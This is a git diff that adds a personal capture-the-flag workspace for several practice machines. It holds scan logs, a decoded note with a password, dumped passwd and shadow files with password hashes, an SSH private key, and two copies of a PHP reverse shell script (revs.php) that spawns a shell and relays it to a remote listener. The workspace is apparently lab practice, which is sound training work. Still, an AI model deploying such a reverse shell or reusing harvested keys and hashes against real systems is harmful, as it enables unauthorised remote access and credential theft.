diff --git a/CTF/BreakOutTheCage/dad_tasks b/CTF/BreakOutTheCage/dad_tasks new file mode 100644 index 0000000..efee1f3 --- /dev/null +++ b/CTF/BreakOutTheCage/dad_tasks @@ -0,0 +1 @@ +UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds \ No newline at end of file diff --git a/CTF/BreakOutTheCage/dad_tasks_decrypt b/CTF/BreakOutTheCage/dad_tasks_decrypt new file mode 100644 index 0000000..33316e7 --- /dev/null +++ b/CTF/BreakOutTheCage/dad_tasks_decrypt @@ -0,0 +1,8 @@ +Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!! +One. Revamp the website +Two. Put more quotes in script +Three. Buy bee pesticide +Four. Help him with acting lessons +Five. Teach Dad what "information security" is. + +In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes diff --git a/CTF/BreakOutTheCage/gobuster_scan01.txt b/CTF/BreakOutTheCage/gobuster_scan01.txt new file mode 100644 index 0000000..c538b96 --- /dev/null +++ b/CTF/BreakOutTheCage/gobuster_scan01.txt @@ -0,0 +1,5 @@ +images  (Status: 301) [Size: 315] [--> http://10.81.144.166/images/] +html  (Status: 301) [Size: 313] [--> http://10.81.144.166/html/] +scripts  (Status: 301) [Size: 316] [--> http://10.81.144.166/scripts/] +contracts  (Status: 301) [Size: 318] [--> http://10.81.144.166/contracts/] +auditions  (Status: 301) [Size: 318] [--> http://10.81.144.166/auditions/] diff --git a/CTF/BreakOutTheCage/ip.txt b/CTF/BreakOutTheCage/ip.txt new file mode 100644 index 0000000..d0f4d3c --- /dev/null +++ b/CTF/BreakOutTheCage/ip.txt @@ -0,0 +1 @@ +10.81.144.166 diff --git a/CTF/BreakOutTheCage/nmap_scan01.txt b/CTF/BreakOutTheCage/nmap_scan01.txt new file mode 100644 index 0000000..2d058b2 --- /dev/null +++ b/CTF/BreakOutTheCage/nmap_scan01.txt @@ -0,0 +1,55 @@ +# Nmap 7.99 scan initiated Wed Apr 29 19:24:34 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan01.txt 10.81.144.166 +Nmap scan report for 10.81.144.166 +Host is up (0.051s latency). +Not shown: 65532 closed tcp ports (reset) +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.3 +| ftp-syst: +| STAT: +| FTP server status: +| Connected to ::ffff:192.168.138.181 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 4 +| vsFTPd 3.0.3 - secure, fast, stable +|_End of status +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA) +| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA) +|_ 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Nicholas Cage Stories +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.99%E=4%D=4/29%OT=21%CT=1%CU=35349%PV=Y%DS=3%DC=T%G=Y%TM=69F23EF +OS:D%P=aarch64-unknown-linux-gnu)SEQ(TI=Z%CI=Z%II=I%TS=A)SEQ(SP=103%GCD=1%I +OS:SR=104%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A) +OS:SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=10A%TI +OS:=Z%CI=Z%II=I%TS=A)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M +OS:4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B +OS:3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%D +OS:F=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A= +OS:Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF +OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O= +OS:%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G +OS:)IE(R=Y%DFI=N%T=40%CD=S) + +Network Distance: 3 hops +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 1723/tcp) +HOP RTT ADDRESS +1 53.24 ms 192.168.128.1 +2 ... +3 52.64 ms 10.81.144.166 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Wed Apr 29 19:25:17 2026 -- 1 IP address (1 host up) scanned in 42.58 seconds diff --git a/CTF/DAV/gobuster_scan_01.txt b/CTF/DAV/gobuster_scan_01.txt new file mode 100644 index 0000000..15d2da3 --- /dev/null +++ b/CTF/DAV/gobuster_scan_01.txt @@ -0,0 +1 @@ +webdav  (Status: 401) [Size: 460] diff --git a/CTF/DAV/ip.txt b/CTF/DAV/ip.txt new file mode 100644 index 0000000..9e31bf9 --- /dev/null +++ b/CTF/DAV/ip.txt @@ -0,0 +1 @@ +10.82.161.192 diff --git a/CTF/DAV/nmap_scan_01.txt b/CTF/DAV/nmap_scan_01.txt new file mode 100644 index 0000000..3e716a0 --- /dev/null +++ b/CTF/DAV/nmap_scan_01.txt @@ -0,0 +1,33 @@ +# Nmap 7.99 scan initiated Fri May 8 10:06:01 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.161.192 +Nmap scan report for 10.82.161.192 +Host is up (0.049s latency). +Not shown: 65534 closed tcp ports (reset) +PORT STATE SERVICE VERSION +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +|_http-title: Apache2 Ubuntu Default Page: It works +|_http-server-header: Apache/2.4.18 (Ubuntu) +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.99%E=4%D=5/8%OT=80%CT=1%CU=35316%PV=Y%DS=3%DC=T%G=Y%TM=69FD99F6 +OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%TS=8)SEQ(SP=1 +OS:04%GCD=1%ISR=10D%TI=Z%CI=I%TS=A)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%TS=8) +OS:SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=RD%TS=8)SEQ(SP=FD%GCD=1%ISR=102%TI=Z%CI +OS:=RD%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M4E8ST11NW +OS:7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF +OS:%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40% +OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=% +OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W +OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) +OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D +OS:FI=N%T=40%CD=S) + +Network Distance: 3 hops + +TRACEROUTE (using port 143/tcp) +HOP RTT ADDRESS +1 51.06 ms 192.168.128.1 +2 ... +3 55.30 ms 10.82.161.192 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri May 8 10:08:22 2026 -- 1 IP address (1 host up) scanned in 141.03 seconds diff --git a/CTF/DAV/nmap_scan_02.txt b/CTF/DAV/nmap_scan_02.txt new file mode 100644 index 0000000..fd23a24 --- /dev/null +++ b/CTF/DAV/nmap_scan_02.txt @@ -0,0 +1,22 @@ +# Nmap 7.99 scan initiated Fri May 8 10:09:35 2026 as: /usr/lib/nmap/nmap --privileged -sV --script http-headers -oN nmap_scan_02.txt 10.82.161.192 +Nmap scan report for 10.82.161.192 +Host is up (0.091s latency). +Not shown: 999 closed tcp ports (reset) +PORT STATE SERVICE VERSION +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +|_http-server-header: Apache/2.4.18 (Ubuntu) +| http-headers: +| Date: Fri, 08 May 2026 08:09:44 GMT +| Server: Apache/2.4.18 (Ubuntu) +| Last-Modified: Mon, 26 Aug 2019 03:38:48 GMT +| ETag: "2c39-590fce4d4ea8c" +| Accept-Ranges: bytes +| Content-Length: 11321 +| Vary: Accept-Encoding +| Connection: close +| Content-Type: text/html +| +|_ (Request type: HEAD) + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri May 8 10:09:44 2026 -- 1 IP address (1 host up) scanned in 9.19 seconds diff --git a/CTF/DAV/passwd.txt b/CTF/DAV/passwd.txt new file mode 100644 index 0000000..9ce67db --- /dev/null +++ b/CTF/DAV/passwd.txt @@ -0,0 +1,30 @@ +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false +systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false +systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false +systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false +syslog:x:104:108::/home/syslog:/bin/false +_apt:x:105:65534::/nonexistent:/bin/false +messagebus:x:106:110::/var/run/dbus:/bin/false +uuidd:x:107:111::/run/uuidd:/bin/false +merlin:x:1000:1000:dav,,,:/home/merlin:/bin/bash +sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin +wampp:x:1001:1001:webdav,,,:/home/wampp:/bin/bash + diff --git a/CTF/DAV/revs.php b/CTF/DAV/revs.php new file mode 100755 index 0000000..0b3e260 --- /dev/null +++ b/CTF/DAV/revs.php @@ -0,0 +1,192 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/CTF/DAV/shadow b/CTF/DAV/shadow new file mode 100644 index 0000000..edb4639 --- /dev/null +++ b/CTF/DAV/shadow @@ -0,0 +1,30 @@ +root:!:18134:0:99999:7::: +daemon:*:17953:0:99999:7::: +bin:*:17953:0:99999:7::: +sys:*:17953:0:99999:7::: +sync:*:17953:0:99999:7::: +games:*:17953:0:99999:7::: +man:*:17953:0:99999:7::: +lp:*:17953:0:99999:7::: +mail:*:17953:0:99999:7::: +news:*:17953:0:99999:7::: +uucp:*:17953:0:99999:7::: +proxy:*:17953:0:99999:7::: +www-data:*:17953:0:99999:7::: +backup:*:17953:0:99999:7::: +list:*:17953:0:99999:7::: +irc:*:17953:0:99999:7::: +gnats:*:17953:0:99999:7::: +nobody:*:17953:0:99999:7::: +systemd-timesync:*:17953:0:99999:7::: +systemd-network:*:17953:0:99999:7::: +systemd-resolve:*:17953:0:99999:7::: +systemd-bus-proxy:*:17953:0:99999:7::: +syslog:*:17953:0:99999:7::: +_apt:*:17953:0:99999:7::: +messagebus:*:18134:0:99999:7::: +uuidd:*:18134:0:99999:7::: +merlin:$1$EWeeql.h$8mH.7rEhPRGsOb5ECtmIe1:18134:0:99999:7::: +sshd:*:18134:0:99999:7::: +wampp:$6$f8LMirW0$43znQ5kMsELDO9BdUmhbGkUEnVH2OKXZjfEtsyUgbvL79KoJtgLkdbJpHw4OuDDIMtaXjGjkjaRKDv1FFxKsr/:18134:0:99999:7::: + diff --git a/CTF/DAV/test.php b/CTF/DAV/test.php new file mode 100644 index 0000000..e69de29 diff --git a/CTF/DAV/wampp_password.txt b/CTF/DAV/wampp_password.txt new file mode 100644 index 0000000..52a3981 --- /dev/null +++ b/CTF/DAV/wampp_password.txt @@ -0,0 +1 @@ +wampp: diff --git a/CTF/Startup/gobuster_scan01.txt b/CTF/Startup/gobuster_scan01.txt new file mode 100644 index 0000000..3a3f51e --- /dev/null +++ b/CTF/Startup/gobuster_scan01.txt @@ -0,0 +1 @@ +files  (Status: 301) [Size: 314] [--> http://10.81.179.111/files/] diff --git a/CTF/Startup/hydra.restore b/CTF/Startup/hydra.restore new file mode 100644 index 0000000..7693ed5 Binary files /dev/null and b/CTF/Startup/hydra.restore differ diff --git a/CTF/Startup/important.jpg b/CTF/Startup/important.jpg new file mode 100644 index 0000000..92969ff Binary files /dev/null and b/CTF/Startup/important.jpg differ diff --git a/CTF/Startup/ip.txt b/CTF/Startup/ip.txt new file mode 100644 index 0000000..e8353a0 --- /dev/null +++ b/CTF/Startup/ip.txt @@ -0,0 +1 @@ +10.81.179.111 diff --git a/CTF/Startup/nmap_scan01.txt b/CTF/Startup/nmap_scan01.txt new file mode 100644 index 0000000..cea5c57 --- /dev/null +++ b/CTF/Startup/nmap_scan01.txt @@ -0,0 +1,57 @@ +# Nmap 7.99 scan initiated Wed Apr 29 18:08:32 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan01.txt 10.81.179.111 +Nmap scan report for 10.81.179.111 +Host is up (0.051s latency). +Not shown: 65532 closed tcp ports (reset) +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.3 +| ftp-syst: +| STAT: +| FTP server status: +| Connected to 192.168.138.181 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 4 +| vsFTPd 3.0.3 - secure, fast, stable +|_End of status +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable] +| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg +|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA) +| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA) +|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519) +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +|_http-title: Maintenance +|_http-server-header: Apache/2.4.18 (Ubuntu) +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.99%E=4%D=4/29%OT=21%CT=1%CU=30469%PV=Y%DS=3%DC=T%G=Y%TM=69F22D2 +OS:C%P=aarch64-unknown-linux-gnu)SEQ(SP=103%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS +OS:=8)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=109 +OS:%TI=Z%CI=I%II=I%TS=8)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ(SP +OS:=108%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7 +OS:%O3=M4E8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W +OS:2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NN +OS:SNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y +OS:%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR +OS:%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40 +OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G +OS:%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) + +Network Distance: 3 hops +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 47.91 ms 192.168.128.1 +2 ... +3 50.26 ms 10.81.179.111 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Wed Apr 29 18:09:16 2026 -- 1 IP address (1 host up) scanned in 44.08 seconds diff --git a/CTF/Startup/revs.php b/CTF/Startup/revs.php new file mode 100755 index 0000000..0b3e260 --- /dev/null +++ b/CTF/Startup/revs.php @@ -0,0 +1,192 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/CTF/Startup/suspicious.pcapng b/CTF/Startup/suspicious.pcapng new file mode 100644 index 0000000..bcbe206 Binary files /dev/null and b/CTF/Startup/suspicious.pcapng differ diff --git a/CTF/Startup/username.txt b/CTF/Startup/username.txt new file mode 100644 index 0000000..ccac9c5 --- /dev/null +++ b/CTF/Startup/username.txt @@ -0,0 +1,2 @@ +maya +Maya diff --git a/CTF/TeamCW/New_site.txt b/CTF/TeamCW/New_site.txt new file mode 100644 index 0000000..2a10367 --- /dev/null +++ b/CTF/TeamCW/New_site.txt @@ -0,0 +1,7 @@ +Dale + I have started coding a new website in PHP for the team to use, this is currently under development. It can be +found at ".dev" within our domain. + +Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file. + +Gyles diff --git a/CTF/TeamCW/gobuster_scan01.txt b/CTF/TeamCW/gobuster_scan01.txt new file mode 100644 index 0000000..f75c138 --- /dev/null +++ b/CTF/TeamCW/gobuster_scan01.txt @@ -0,0 +1,5 @@ +.hta  (Status: 403) [Size: 277] +.htaccess  (Status: 403) [Size: 277] +.htpasswd  (Status: 403) [Size: 277] +index.html  (Status: 200) [Size: 11366] +server-status  (Status: 403) [Size: 277] diff --git a/CTF/TeamCW/gobuster_scan02.txt b/CTF/TeamCW/gobuster_scan02.txt new file mode 100644 index 0000000..0ce7c8f --- /dev/null +++ b/CTF/TeamCW/gobuster_scan02.txt @@ -0,0 +1 @@ +server-status  (Status: 403) [Size: 277] diff --git a/CTF/TeamCW/gobuster_scan03.txt b/CTF/TeamCW/gobuster_scan03.txt new file mode 100644 index 0000000..ef00259 --- /dev/null +++ b/CTF/TeamCW/gobuster_scan03.txt @@ -0,0 +1,3 @@ +images  (Status: 301) [Size: 305] [--> http://team.thm/images/] +scripts  (Status: 301) [Size: 306] [--> http://team.thm/scripts/] +assets  (Status: 301) [Size: 305] [--> http://team.thm/assets/] diff --git a/CTF/TeamCW/id_rsa b/CTF/TeamCW/id_rsa new file mode 100644 index 0000000..2f0eb15 --- /dev/null +++ b/CTF/TeamCW/id_rsa @@ -0,0 +1,38 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +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 